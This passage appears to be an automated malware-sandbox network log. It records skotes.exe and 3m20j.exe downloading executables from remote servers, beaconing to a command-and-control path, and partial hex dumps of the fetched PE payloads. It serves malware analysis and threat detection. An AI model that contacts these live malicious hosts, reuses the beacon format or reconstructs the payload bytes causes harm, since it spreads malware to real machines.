                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:52.045999050 CET1236INData Raw: fa 1d 44 4b db 94 b2 41 9a bd ea 09 48 25 bb 69 91 f1 84 d6 41 10 2e de 1d 2f 06 f8 2e a8 d5 d5 b6 73 3c 18 d1 46 76 01 d0 66 3c 11 df ae 06 c6 56 97 60 c9 a6 8e 92 20 d3 68 1d 77 df 30 b9 92 09 35 97 1d cf 42 97 08 e9 51 b4 e6 f4 28 0a e9 cf aa
                                                                                                                                                                                                                                                          Data Ascii: DKAH%iA./.s<Fvf<V` hw05BQ(F%4E@v(JatGdP>sYyWe\FXd9)sbs(*f858"N`m>(TI\5hW?5IAg4mUl&s~Uvsp.X
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:52.046010017 CET1236INData Raw: ce dd b9 41 de 8e 19 b8 56 ef 49 1e d3 70 48 1a a0 54 8e 43 d3 5f 9a 34 8c 62 9b 61 75 8c f1 5a fb f2 9e f6 38 3e 36 31 cf 9c 69 98 5e 61 d5 e5 09 ec a9 fa 19 32 5b 6c 2e 27 9d b0 1b 8c dd 23 c3 1d 2e 22 d2 18 e0 8f 4e 17 14 5e 1c ea 29 10 46 50
                                                                                                                                                                                                                                                          Data Ascii: AVIpHTC_4bauZ8>61i^a2[l.'#."N^)FPd6d}A;xMZ:{~i\r2+Guflb~?%lc~(5kS: "P==CK"8LNcR8^tW9p+>Bq==
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:52.046674967 CET1236INData Raw: b1 7c 06 9f 5a 8c c2 df d5 a4 27 f8 81 1e d3 8c 40 7d 44 8b 15 36 69 25 35 5d da ad 09 57 c0 99 70 8a c5 8d 64 e6 16 fe c6 7d bd b8 82 fd a8 3c 28 5a 12 cb 46 ac 66 9b 84 eb 30 a6 7c 44 6e cd 86 a5 18 07 11 75 09 c9 54 1f 4d cc 67 dc fa c0 f9 94
                                                                                                                                                                                                                                                          Data Ascii: |Z'@}D6i%5]Wpd}<(ZFf0|DnuTMg} J}$h>>Au=O[+iIhUT)9R[B5\K lhrh9H2x1@!+vMJNY0kAf:Fhfl\>plOtJA!.``O]3
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:52.046685934 CET1236INData Raw: 82 f6 09 89 06 b2 63 8a 00 65 53 32 a8 ff 28 b1 17 6b 19 bc 45 89 f7 e3 2c 74 0e d0 32 9d 84 e5 fd 75 4b 37 ec e6 39 e5 00 44 18 ec 0d dc f8 dd c7 f9 a7 00 d0 d3 ed b2 43 8c 18 b2 c3 bf 91 73 cf 12 e9 24 97 06 fd 79 93 f3 a6 75 2b e3 43 70 04 2b
                                                                                                                                                                                                                                                          Data Ascii: ceS2(kE,t2uK79DCs$yu+Cp+`D),k'^C1bM2=e_vV!Qz|LgeMiIkF,OeR] K_x|:)Zqi&Kv-i>)e$*`diGCCl%`ofh>M>
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:52.047337055 CET1236INData Raw: 30 7c 1c 04 ab 2a 97 d9 b6 8e 49 9f e7 fe 8e 9e 1e ca f3 28 01 51 66 c3 9d 99 a7 88 74 f4 51 0e 56 16 79 9c 7b 49 d8 b0 72 d4 fc 22 9a 25 fa 24 b2 d5 2b 2c 81 9b e7 aa 65 ca a8 0d 2e 62 58 b9 6b ab 46 29 9b 98 7d bd 4f d8 c1 04 dc d1 20 43 83 54
                                                                                                                                                                                                                                                          Data Ascii: 0|*I(QftQVy{Ir"%$+,e.bXkF)}O CTtE39l8L{t5iK,zrbsSID('zNQ9;Bl3*5G-Fhw:(Pf_rumvv4\v@NZ
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:52.047389030 CET1236INData Raw: 28 ca 6c ae 52 eb 77 ea 50 95 29 26 6a 74 f1 d4 4f 4a 99 22 f0 f9 3e 13 75 c4 18 49 5a 2c 67 e0 3c 81 2a ce 84 14 6c e5 50 31 db a0 92 ce 7f c7 ef a1 11 5c 1f 47 73 bf 18 f9 f8 1f b6 59 9c 75 17 b3 a6 95 e0 55 e1 fd 8c 53 74 22 58 6a 03 24 7d ee
                                                                                                                                                                                                                                                          Data Ascii: (lRwP)&jtOJ">uIZ,g<*lP1\GsYuUSt"Xj$}tsM+u9kCP=y+/cmkh &~5gR[q['5[5T`6`T}h'0Z2k{3_Iy_42, ~$O<M&A,R 3m%
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:52.198699951 CET1236INData Raw: 69 91 dd f9 07 aa 5f e1 8f 69 8b 69 79 61 04 03 1d de 59 fe 3e e9 67 3f 7b 58 33 35 22 6d 9f 7a c8 54 69 08 79 1c d5 e5 8a 62 11 ae 50 58 6e 0b 40 63 b6 97 a1 73 88 2e fa 1d 7d d9 97 04 64 da ed 5e 73 38 a8 32 55 ec e2 c3 00 b2 ed 1f 10 3a b3 60
                                                                                                                                                                                                                                                          Data Ascii: i_iiyaY>g?{X35"mzTiybPXn@cs.}d^s82U:`)7Jntp1"lsu+U7gqN*lBLtE32'?Okj)l2dm;u;Q+_*G14|nB8sP*GLZAq1C{


                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                          12192.168.2.44977931.41.244.11806416C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:50.602030993 CET62OUTGET /files/unique3/random.exe HTTP/1.1
                                                                                                                                                                                                                                                          Host: 31.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:52.033761978 CET1236INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                          Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                                          Date: Thu, 19 Dec 2024 13:20:51 GMT
                                                                                                                                                                                                                                                          Content-Type: application/octet-stream
                                                                                                                                                                                                                                                          Content-Length: 1988608
                                                                                                                                                                                                                                                          Last-Modified: Thu, 19 Dec 2024 11:46:25 GMT
                                                                                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                                                                                          ETag: "67640791-1e5800"
                                                                                                                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                                                                                                                          Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 10 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 cd d8 9a 7a 89 b9 f4 29 89 b9 f4 29 89 b9 f4 29 c2 c1 f7 28 82 b9 f4 29 c2 c1 f1 28 06 b9 f4 29 c2 c1 f0 28 9d b9 f4 29 9c c6 f1 28 af b9 f4 29 9c c6 f0 28 98 b9 f4 29 9c c6 f7 28 9d b9 f4 29 c2 c1 f5 28 8a b9 f4 29 89 b9 f5 29 da b9 f4 29 89 b9 f4 29 8b b9 f4 29 b3 39 f0 28 8a b9 f4 29 b3 39 0b 29 88 b9 f4 29 b3 39 f6 28 88 b9 f4 29 52 69 63 68 89 b9 f4 29 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 07 00 5f 7b 5f 64 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0e 25 00 7c 03 00 00 5e 03 00 00 00 01 00 00 d0 4b 00 00 10 00 00 00 90 03 00 00 00 40 00 00 10 00 00 00 02 00 00 06 00 [TRUNCATED]
                                                                                                                                                                                                                                                          Data Ascii: MZ@!L!This program cannot be run in DOS mode.$z)))()()()()()()()))))9()9))9()Rich)PEL_{_d%|^K@L}\@Vjl <@.rsrclL@.idata T@ )V@vxwcoufq1X@pnspstgaK2@.taggant0K"6@
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:52.033775091 CET224INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                                          Data Ascii:
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:52.033782959 CET1236INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                                          Data Ascii:
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:52.034584999 CET1236INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                                          Data Ascii:
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:52.034605026 CET1236INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                                          Data Ascii:
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:52.035248041 CET1236INData Raw: d6 20 1b e5 be 9f 05 c2 22 f7 ab ff 36 49 f5 3a 54 85 05 93 87 66 99 e2 ac 3c 8a ff d0 45 4f dd 4c 33 e5 b2 14 b0 9b e0 66 bf 74 d9 75 c0 aa 0a 9c 47 4d 8e 83 e6 c1 c2 33 50 2e 1c 56 59 aa 77 8b 1b 87 e4 e3 2c 54 a9 fe 68 d5 05 03 93 47 86 e5 f8
                                                                                                                                                                                                                                                          Data Ascii: "6I:Tf<EOL3ftuGM3P.VYw,ThGqO;8a<\Bp~vi]0&6_Y+`Fh&<txj3eE0rMnn+$_e$R7c48w)|fXMn_@3fYwf6b
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:52.035259962 CET1236INData Raw: 52 dc 98 12 df cd 6d dd 95 c9 4a 67 91 f2 c8 1e 62 e4 fb 05 6a 17 a1 fe 9e 62 a3 26 19 02 3d ce 36 49 ab a9 89 ad 05 92 06 c7 26 e2 ba 8e 3d 4d 74 81 6d 13 9e 8b d1 7e f0 f9 ab fc f2 3a d0 44 4a cd 5d a1 d7 d9 e3 26 e1 19 81 cd 36 49 ba 13 dc 5a
                                                                                                                                                                                                                                                          Data Ascii: RmJgbjb&=6I&=Mtm~:DJ]&6IZ?M4Dq_x[^&DCM&.428U~sfW]V&y1&7I3ik]!'6x1q~KsD]D>&X@6Iy,_z~p+Fr]A!3
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:52.035270929 CET1120INData Raw: 5b d9 f9 f6 66 62 08 57 b4 9b 26 54 1c 71 48 93 95 0a 7c 64 cd 0b 0d ab 62 a0 3d 05 08 c2 47 72 f7 b6 14 17 dd 99 d2 e8 36 49 da d5 81 9c 05 fd f3 71 5f fd ba c1 4b 5a 8c 81 9d 9c 17 12 21 d0 d4 16 2b 16 37 c8 a6 0b c8 46 32 a4 0d 29 05 cf 33 ac
                                                                                                                                                                                                                                                          Data Ascii: [fbW&TqH|db=Gr6Iq_KZ!+7F2)3]'W2a`5h{dHYwZ8FKt<rV-P'\LMJ4[jp~3Dv}*w.:UpYiF6g\|dojbrG<yC9U-bU&.oq
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:52.036113024 CET1236INData Raw: 8a d7 bd 0f 74 24 cc a0 26 49 b0 62 f0 84 05 de 01 d9 77 fd ba 5d 38 f1 07 81 22 39 66 f0 d1 7e 96 5c 7e 10 f2 8d 57 c9 0a cd 5d fd 1f 9d a7 26 aa 3c 4a ad 36 49 e7 20 e1 ae 05 c0 15 30 29 e2 ba 85 f7 53 30 81 51 17 45 d6 d1 7e 76 5f 97 0c f2 79
                                                                                                                                                                                                                                                          Data Ascii: t$&Ibw]8"9f~\~W]&<J6I 0)S0QE~v_y] &kO6I55>BI~}-|Z,]&*FO6IavD83<%aYwLJtx'7P`Y?sBX~@&:MJ3FYwCMsRwpY$zp
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:52.036124945 CET224INData Raw: 92 fe d1 7e 12 94 b6 c9 f2 45 4c bd 43 cd 5d fe e6 1e 16 29 51 f4 bb 56 34 c7 d6 df 70 ad 59 f2 0a e4 94 46 0c ff e4 a8 19 39 74 3d 4f 9b c4 4b 8e 2e 26 0e 3a 50 82 a1 1b c0 e9 f7 d0 ec 4d 0f 83 38 8d 8e 33 57 df 88 8e 59 a3 77 e0 98 69 e7 16 18
                                                                                                                                                                                                                                                          Data Ascii: ~ELC])QV4pYF9t=OK.&:PM83WYwitC7jPd=M]G3ydYw_YR3EpkYFEj+yg!)jRp6Y<kFLNEIbR9J!K8jhR pYA
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:52.196444035 CET1236INData Raw: 2c 0e be 46 6b eb ee a8 97 5d 17 1a 03 55 c4 5a 8d f9 27 0e 3a 50 64 3b 90 c0 22 d5 2a cd 4d a7 9b 92 ca 14 34 d4 bc 7e 31 71 36 a1 95 ef 2c 64 3e 5b 73 1a 62 6c 86 05 07 b9 47 97 5b 97 ec 16 a1 c4 a6 88 b0 43 a9 33 c6 44 55 d3 fb 62 f1 48 8f f5
                                                                                                                                                                                                                                                          Data Ascii: ,Fk]UZ':Pd;"*M4~1q6,d>[sblG[C3DUbHbg%j},R;qYZ0FyNsEjz"Ye!T3@e`D.f~&%7ICbX'a^gj29ST]T&(|n6I_e?l+~AvmwX8+


                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                          13192.168.2.449791185.215.113.43806416C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:57.788276911 CET184OUTPOST /Zu7JuNko/index.php HTTP/1.1
                                                                                                                                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                          Host: 185.215.113.43
                                                                                                                                                                                                                                                          Content-Length: 31
                                                                                                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                                                                                                          Data Raw: 64 31 3d 31 30 31 37 36 32 36 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39
                                                                                                                                                                                                                                                          Data Ascii: d1=1017626001&unit=246122658369
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:59.172750950 CET193INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                          Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                                          Date: Thu, 19 Dec 2024 13:20:58 GMT
                                                                                                                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                                                                                          Data Raw: 34 0d 0a 20 3c 63 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                          Data Ascii: 4 <c>0


                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                          14192.168.2.44979731.41.244.11806416C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:59.298378944 CET59OUTGET /files/lolz/random.exe HTTP/1.1
                                                                                                                                                                                                                                                          Host: 31.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:21:00.625627041 CET1236INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                          Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                                          Date: Thu, 19 Dec 2024 13:21:00 GMT
                                                                                                                                                                                                                                                          Content-Type: application/octet-stream
                                                                                                                                                                                                                                                          Content-Length: 21504
                                                                                                                                                                                                                                                          Last-Modified: Wed, 18 Dec 2024 18:13:28 GMT
                                                                                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                                                                                          ETag: "676310c8-5400"
                                                                                                                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                                                                                                                          Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 70 6d 3b c0 00 00 00 00 00 00 00 00 e0 00 22 00 0b 01 30 00 00 4a 00 00 00 08 00 00 00 00 00 00 3a 69 00 00 00 20 00 00 00 80 00 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 c0 00 00 00 02 00 00 00 00 00 00 03 00 60 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 e6 68 00 00 4f 00 00 00 00 80 00 00 9c 05 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 a0 00 00 0c 00 00 00 54 68 00 00 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 [TRUNCATED]
                                                                                                                                                                                                                                                          Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PELpm;"0J:i @ `hOTh8 H.text@I J `.rsrcL@@.relocR@BiH6p108s2(}<}=};|<(+|<(*0P~,Brp(rcp((rp(((o(*08s,(}}}|(+|(*0Hs/+~~ioX-rp(+*0rp( o!+*0rp( o!+
                                                                                                                                                                                                                                                          Dec 19, 2024 14:21:00.625696898 CET1236INData Raw: 00 06 2a 00 00 13 30 03 00 32 00 00 00 06 00 00 11 00 02 72 ef 00 00 70 72 f7 00 00 70 28 22 00 00 0a 6f 23 00 00 0a 0a 06 06 28 03 00 00 2b 28 04 00 00 2b 73 26 00 00 0a 28 27 00 00 0a 0b 2b 00 07 2a 00 00 1b 30 04 00 ad 00 00 00 07 00 00 11 00
                                                                                                                                                                                                                                                          Data Ascii: *02rprp("o#(+(+s&('+*0s(rp( (+~%-&~s*%(+(+o-+@(.o/,%o0Xo1+o1(2-o3
                                                                                                                                                                                                                                                          Dec 19, 2024 14:21:00.625710011 CET1236INData Raw: 2b 73 26 00 00 0a 6f 40 00 00 0a 00 00 12 02 28 32 00 00 0a 2d b2 de 0f 12 02 fe 16 04 00 00 1b 6f 33 00 00 0a 00 dc 07 13 04 2b 00 11 04 2a 00 00 01 10 00 00 02 00 49 00 52 9b 00 0f 00 00 00 00 13 30 04 00 b0 00 00 00 0f 00 00 11 73 28 00 00 06
                                                                                                                                                                                                                                                          Data Ascii: +s&o@(2-o3+*IR0s(sM%rupoN&%rpoN&%rpoN&%rpoN&%rpoN&%rpoN&}rp( (+~%-&~%s*%(+(+)sO(+
                                                                                                                                                                                                                                                          Dec 19, 2024 14:21:00.626126051 CET1236INData Raw: 42 02 7b 12 00 00 04 03 6f 72 00 00 0a 16 fe 01 2a 22 02 28 6e 00 00 0a 00 2a 62 03 02 7b 13 00 00 04 03 6f 38 00 00 0a 6f 1e 00 00 0a 6f 36 00 00 0a 2a 22 02 28 6e 00 00 0a 00 2a 00 1b 30 04 00 fe 05 00 00 19 00 00 11 02 7b 14 00 00 04 0a 06 2c
                                                                                                                                                                                                                                                          Data Ascii: B{or*"(n*b{o8oo6*"(n*0{,+8o{(}r7p{?(s(~(#(t({o8}rgp{?(s({(}rp{?(s(
                                                                                                                                                                                                                                                          Dec 19, 2024 14:21:00.626140118 CET1236INData Raw: 04 02 7c 2b 00 00 04 28 32 00 00 0a 2d cd de 17 06 16 2f 12 02 7c 2b 00 00 04 fe 16 04 00 00 1b 6f 33 00 00 0a 00 dc 02 7c 2b 00 00 04 fe 15 04 00 00 1b 02 02 7b 16 00 00 04 28 11 00 00 06 7d 26 00 00 04 72 9e 08 00 70 28 19 00 00 0a 00 00 02 02
                                                                                                                                                                                                                                                          Data Ascii: |+(2-/|+o3|+{(}&rp({&o-}-+&|-(.}.{.(}.|-(2-/|-o3|-rp(W}}}}} }!
                                                                                                                                                                                                                                                          Dec 19, 2024 14:21:00.626152039 CET1236INData Raw: 01 00 00 02 28 14 00 00 06 7d 3f 00 00 04 72 45 0a 00 70 02 7b 3f 00 00 04 28 75 00 00 0a 80 04 00 00 04 00 7e 04 00 00 04 28 8d 00 00 0a 26 72 4d 0a 00 70 7e 04 00 00 04 28 1a 00 00 0a 28 19 00 00 0a 00 00 de 29 0c 02 08 7d 41 00 00 04 00 72 6f
                                                                                                                                                                                                                                                          Data Ascii: (}?rEp{?(u~(&rMp~(()}Arop{AoY((rp(rp(s s(}@~o{@(,rip(+h{@(oo(
                                                                                                                                                                                                                                                          Dec 19, 2024 14:21:00.626164913 CET1236INData Raw: 00 32 00 11 00 12 0d 9f 04 11 00 72 05 a3 04 31 00 87 0b a6 04 11 00 5f 05 33 03 11 00 d1 02 33 03 11 00 85 03 33 03 51 80 54 05 aa 04 36 00 1c 05 ad 04 16 00 e1 00 b1 04 16 00 0e 01 b1 04 16 00 00 02 bc 04 16 00 54 01 b1 04 16 00 56 00 b1 04 16
                                                                                                                                                                                                                                                          Data Ascii: 2r1_333QT6TV3*3;1Y3 333Hu
                                                                                                                                                                                                                                                          Dec 19, 2024 14:21:00.626571894 CET1236INData Raw: 00 01 00 0b 06 00 00 01 00 c3 0a 00 00 02 00 85 05 00 00 01 00 30 0c 00 00 01 00 41 0e 00 00 01 00 ff 0a 00 00 01 00 ff 0a 00 00 01 00 03 06 00 00 01 00 ff 0a 00 00 01 00 ff 0a 00 00 01 00 ff 0a 00 00 01 00 8c 06 00 00 01 00 ff 0a 00 00 01 00 8c
                                                                                                                                                                                                                                                          Data Ascii: 0AZZZ)Z1Z9ZAZIZQZYZaZiZqZyZZZZ Z11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:21:00.626585960 CET1236INData Raw: 02 f6 02 0b 03 33 03 36 03 46 03 5d 03 67 03 6f 03 7b 03 f0 03 54 04 07 00 5a 00 27 00 07 00 5c 00 29 00 08 00 60 00 27 00 08 00 62 00 29 00 09 00 66 00 27 00 09 00 68 00 29 00 b8 0a ec 00 07 01 4e 01 5d 01 8a 01 cb 01 15 02 43 02 7a 02 b3 02 ba
                                                                                                                                                                                                                                                          Data Ascii: 36F]go{TZ'\)`'b)f'h)N]Cz&</@/dI
                                                                                                                                                                                                                                                          Dec 19, 2024 14:21:00.626604080 CET1236INData Raw: 6f 6e 74 65 6f 50 61 6c 61 62 72 61 73 55 6e 69 63 61 73 3e 35 5f 5f 31 33 00 3c 3e 73 5f 5f 32 33 00 3c 74 65 78 74 6f 45 6e 74 72 61 64 61 3e 35 5f 5f 33 00 3c 63 6f 6e 74 65 6f 4f 72 61 63 69 6f 6e 65 73 3e 35 5f 5f 33 00 3c 3e 73 5f 5f 33 00
                                                                                                                                                                                                                                                          Data Ascii: onteoPalabrasUnicas>5__13<>s__23<textoEntrada>5__3<conteoOraciones>5__3<>s__3<textoConSinonimos>5__14<palabra>5__24<esPalindromo>5__4<flujoArchivo>5__4<ex>5__4<anagramas>5__15<urlDescarga1>5__5<ex>5__5<palabrasConErrores>5__16<ta
                                                                                                                                                                                                                                                          Dec 19, 2024 14:21:00.745636940 CET1236INData Raw: 53 74 61 74 65 4d 61 63 68 69 6e 65 41 74 74 72 69 62 75 74 65 00 44 65 62 75 67 67 65 72 53 74 65 70 54 68 72 6f 75 67 68 41 74 74 72 69 62 75 74 65 00 41 73 73 65 6d 62 6c 79 54 72 61 64 65 6d 61 72 6b 41 74 74 72 69 62 75 74 65 00 54 61 72 67
                                                                                                                                                                                                                                                          Data Ascii: StateMachineAttributeDebuggerStepThroughAttributeAssemblyTrademarkAttributeTargetFrameworkAttributeDebuggerHiddenAttributeAssemblyFileVersionAttributeAssemblyConfigurationAttributeAssemblyDescriptionAttributeTupleElementNamesAttribute


                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                          15192.168.2.449803185.215.113.16805932C:\Users\user\AppData\Local\Temp\IXP001.TMP\3m20j.exe
                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                          Dec 19, 2024 14:21:00.894397020 CET80OUTGET /mine/random.exe HTTP/1.1
                                                                                                                                                                                                                                                          Host: 185.215.113.16
                                                                                                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                                                                                                          Dec 19, 2024 14:21:02.236646891 CET1236INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                          Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                                          Date: Thu, 19 Dec 2024 13:21:01 GMT
                                                                                                                                                                                                                                                          Content-Type: application/octet-stream
                                                                                                                                                                                                                                                          Content-Length: 3008512
                                                                                                                                                                                                                                                          Last-Modified: Thu, 19 Dec 2024 12:39:36 GMT
                                                                                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                                                                                          ETag: "67641408-2de800"
                                                                                                                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                                                                                                                          Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 a7 bb 2d 49 e3 da 43 1a e3 da 43 1a e3 da 43 1a b8 b2 40 1b ed da 43 1a b8 b2 46 1b 42 da 43 1a 36 b7 47 1b f1 da 43 1a 36 b7 40 1b f5 da 43 1a 36 b7 46 1b 96 da 43 1a b8 b2 47 1b f7 da 43 1a b8 b2 42 1b f0 da 43 1a e3 da 42 1a 35 da 43 1a 78 b4 4a 1b e2 da 43 1a 78 b4 bc 1a e2 da 43 1a 78 b4 41 1b e2 da 43 1a 52 69 63 68 e3 da 43 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 9c 56 f0 66 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0e 18 00 ea 04 00 00 9a 01 00 00 00 00 00 00 90 31 00 00 10 00 00 00 00 05 00 00 00 40 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 [TRUNCATED]
                                                                                                                                                                                                                                                          Data Ascii: MZ@!L!This program cannot be run in DOS mode.$-ICCC@CFBC6GC6@C6FCGCBCB5CxJCxCxACRichCPELVf1@1x.@Wk{1z1 @.rsrc@.idata @odogmioi**@qyfccaeh1-@.taggant01"-@
                                                                                                                                                                                                                                                          Dec 19, 2024 14:21:02.236675024 CET1236INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                                          Data Ascii:
                                                                                                                                                                                                                                                          Dec 19, 2024 14:21:02.236689091 CET1236INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                                          Data Ascii:
                                                                                                                                                                                                                                                          Dec 19, 2024 14:21:02.236932993 CET1236INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                                          Data Ascii:
